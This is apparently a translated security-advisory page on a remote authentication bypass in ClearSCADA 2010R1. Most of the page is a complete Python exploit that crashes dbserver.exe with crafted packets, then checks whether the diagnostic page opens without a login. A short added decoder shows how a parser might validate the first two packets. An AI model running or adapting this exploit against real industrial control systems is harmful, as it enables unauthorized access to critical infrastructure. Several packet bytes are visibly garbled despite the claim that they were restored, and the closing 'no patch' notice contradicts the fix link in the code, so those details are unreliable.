ClearSCADA 'dbserver.exe' Remote Authentication Bypass Vulnerability

Source: Internet
Author: User

Release date:
Updated on:

Affected Systems:
ClearSCADA 2010R1
Description:
Bugtraq id: 72381

ClearSCADA is an integrated SCADA host platform.

ClearSCADA 2010R1 (and possibly other versions) enters a "safe mode" when an exception occurs in 'dbserver.exe'. In safe mode the diagnostic functions can be reached by remote users without a valid login, so the implementation contains a remote authentication bypass vulnerability; an attacker can exploit it to bypass authentication and obtain sensitive information.

<* Source: Jeremy Brown

Link: http://www.exploit-db.com/exploits/35924/
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/python
# cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# exploited by triggering an exception in dbserver.exe and taking advantage
# of the way the program handles it.
#
# When an exception occurs, ClearSCADA enters "Safe Mode". This exposes
# its diagnostic functions to remote users without requiring a valid login
# as it would normally. A remote attacker could view sensitive information
# and possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#
# Note on this copy: Python 2 (httplib). The byte strings below are taken
# from the scraped copy of the exploit; its three garbled "\ cross" escapes
# have been restored to \x70 ('p', completing "...ValueMap"), and every
# other byte is left exactly as printed.

import sys
import socket
import httplib
from time import sleep

# Handshake: "IP 127.0.0.1, Session 0" as a length-prefixed UTF-16LE string
pkt_1 = (
    "\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
    "\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
    "\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
    "\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
    "\x08\x00\x00\x00"
)

# One length-prefixed UTF-16LE class name
pkt_2 = (
    "\x00\x00\x00\x00"
    "\x26\x00\x00\x00"
    "\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
    "\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x00\x00\x6f\x00\x72\x00"
    "\x74\x00\x73\x00\x00\x00"
)

# List of length-prefixed class names; this is the packet that raises the
# exception in dbserver.exe ("Exception Occurred")
pkt_3 = (
    "\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00"
    "\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00"
    "\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
    "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00"
    "\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
    "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00"
    "\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00"
    "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00"
    "\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00"  # last w0rd
    "\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
    "\x00\x4d\x00\x61\x00\x00\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41"
    "\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61"
    "\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11"
    "\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52"
    "\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61"
    "\x00\x00\x00\x00\x11\x00\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76"
    "\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75"
    "\x00\x65\x00\x4d\x00\x61\x00\x00\x00\x00\x00\x12\x00\x00\x00\x43"
    "\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54"
    "\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
    "\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52"
    "\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
    "\x00\x4d\x00\x61\x00\x00\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41"
    "\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45"
    "\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
    "\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53"
    "\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c"
    "\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x00\x00\x00\x00\x0f\x00\x00"
    "\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c"
    "\x00\x52\x00\x65\x00\x00\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00"
)

port = 5481    # dbserver.exe native protocol
s_port = 443   # HTTPS front end serving /diag/Info


def do_ssl(target, port):
    """GET /diag/Info over HTTPS. 301 is the normal (authenticated-only)
    response; 200 means the diagnostic page was served without a login."""
    try:
        conn = httplib.HTTPSConnection(target, port)
        conn._http_vsn = 10
        conn._http_vsn_str = "HTTP/1.0"

        conn.request("GET", "/diag/Info")

        resp = conn.getresponse()
        conn.close()

    except Exception as error:
        print("Error: %s" % error)
        return None

    return resp


def main():

    if len(sys.argv) != 2:
        print("Usage: %s <target>" % sys.argv[0])
        sys.exit(0)

    target = sys.argv[1]
    cs = (target, port)

    print("Checking server status...")

    resp = do_ssl(target, s_port)

    if resp is None:
        return

    if resp.status == 301:
        print("Server status is normal.\n")

    elif resp.status == 200:
        print("Server is already in safe mode.")
        sys.exit(1)

    else:
        print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status, resp.reason))

    print("Sending packets to trigger exception...\n")

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(cs)

        sock.send(pkt_1)
        resp_1 = sock.recv(32)

        sock.send(pkt_2)
        resp_2 = sock.recv(32)

        sock.send(pkt_3)
        resp_3 = sock.recv(32)

        sock.close()

    except Exception as error:
        print("Error: %s" % error)
        return None

    print("Finished, checking server status again...")

    sleep(1)

    resp = do_ssl(target, s_port)

    if resp is None:
        return

    if resp.status == 301:
        print("Server status is still normal, maybe it's patched...\n")

    elif resp.status == 200:
        print("Server entered \"safe\" mode :)\n")
        print("Surf on over to https://%s:443/diag/Info for details" % target)

    else:
        print("Server returned %d %s, server state unknown." % (resp.status, resp.reason))


if __name__ == "__main__":
    main()
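As an added illustration (not part of the original PoC and not ClearSCADA's own code), the following is a small validating decoder for the first two packets the PoC sends to port 5481. The entry layout it assumes, a 32-bit little-endian count of UTF-16 code units followed by that many units ending in NUL, is read off pkt_1 and pkt_2 as printed above and is not documented by the page; the point is the count and terminator checking a robust parser performs before trusting such fields.

```python
import struct

# Packets 1 and 2 of the PoC above, transcribed verbatim (the scraped copy has
# \x00 where the 'p' of "Reports" would sit; it is kept exactly as printed).
PKT_1 = (b"\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
         b"\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
         b"\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
         b"\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
         b"\x08\x00\x00\x00")
PKT_2 = (b"\x00\x00\x00\x00\x26\x00\x00\x00"
         b"\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
         b"\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x00\x00\x6f\x00\x72\x00"
         b"\x74\x00\x73\x00\x00\x00")

def read_wstr(buf, off):
    """Assumed entry layout: u32 LE count of UTF-16 code units (NUL included),
    then that many units. Count and terminator are verified, not trusted."""
    n = struct.unpack_from("<I", buf, off)[0]
    start, end = off + 4, off + 4 + 2 * n
    if n == 0 or end > len(buf):
        raise ValueError("count %d at offset %d overruns the packet" % (n, off))
    text = buf[start:end].decode("utf-16-le")
    if text[-1] != "\x00":
        raise ValueError("entry at offset %d lacks its NUL terminator" % off)
    return text[:-1], end

def decode_pkt1(buf):
    """Observed layout: 4 magic bytes, u32 field, one entry, u32 trailer."""
    field = struct.unpack_from("<I", buf, 4)[0]
    text, off = read_wstr(buf, 8)
    return buf[:4], field, text, struct.unpack_from("<I", buf, off)[0]

def decode_pkt2(buf):
    """Observed layout: u32 zero, u32 byte length of the rest, u32 field, entry."""
    _zero, remaining, field = struct.unpack_from("<III", buf, 0)
    if remaining != len(buf) - 8:
        raise ValueError("length field %d != %d" % (remaining, len(buf) - 8))
    text, off = read_wstr(buf, 12)
    if off != len(buf):
        raise ValueError("%d trailing bytes" % (len(buf) - off))
    return field, text

def is_well_formed(buf, decoder):
    """True when the decoder accepts the packet, False when it rejects it."""
    try:
        decoder(buf)
        return True
    except (ValueError, struct.error):
        return False
```

Feeding pkt_2 with its count field rewritten to overrun the buffer, or shortened so the entry no longer ends in NUL, makes the decoder reject the packet instead of reading past it.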

Suggestion:
Vendor patch:

ClearSCADA
----------
At the time of writing, the vendor has not provided a patch or upgrade. Users of the software are advised to follow the vendor's homepage to obtain the latest version:

http://www.clearscada.com/
